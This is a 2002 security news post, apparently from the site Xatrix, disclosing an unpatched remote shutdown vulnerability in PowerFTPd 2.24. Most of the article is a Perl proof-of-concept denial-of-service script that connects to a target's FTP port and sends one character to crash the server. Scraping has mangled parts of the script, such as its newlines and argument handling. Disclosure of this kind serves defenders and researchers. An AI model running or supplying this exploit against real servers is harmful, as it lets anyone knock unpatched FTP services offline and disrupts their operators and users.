Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » PowerFTPd remote shutdown vulnerability

PowerFTPd remote shutdown vulnerability

by Nikola Strahija on October 12th, 2002 Securma Masimme has found a vulnerability in PowerFTPd 2.24. Any remote user can shutdown the ftp server. Vulnerability level is high.


The Vendor, Coolsoft, has been notified on the 5th of October 2002,
and Securma Masinne (who found this vulnerability), hasn't received
any replies yet.
No patch is available.
Known vulnerable versions: PowerFTPd 2.24 (and earlier maybe).


Securma Masinne has attached a "proof of concept" code:
#!/usr/bin/perl -w
##
# tool: PFdos.pl
# author: [email protected]
# purpose: allows a remote user--any user--to shut down the ftp server
# greetz: all friend in marocit and #crack.fr (especially christal)
##

use Socket;
if (not $ARGV[0]) {
print qq~
Usage: pfdos.pl
~;
exit;}

$ip=$ARGV[0];
print "+++++++++++++++++++++++nn";
print "PowerFTP DOS nn";
print "by securma massine nn";
print "[email protected] nn";
print "+++++++++++++++++++++++nn";
print "Sending Exploit Code to host: " . $ip . "nn";
sendexplt("A");
sub sendexplt {
my ($pstr)[email protected]_;
$target= inet_aton($ip) || die("inet_aton
problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
die("Socket problemsn");
if(connect(S,pack "SnA4x8",2,21,$target)){
select(S);
$|=1;
print $pstr;
sleep 3;
close(S);
} else { die("Can't connect...n"); }
}


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »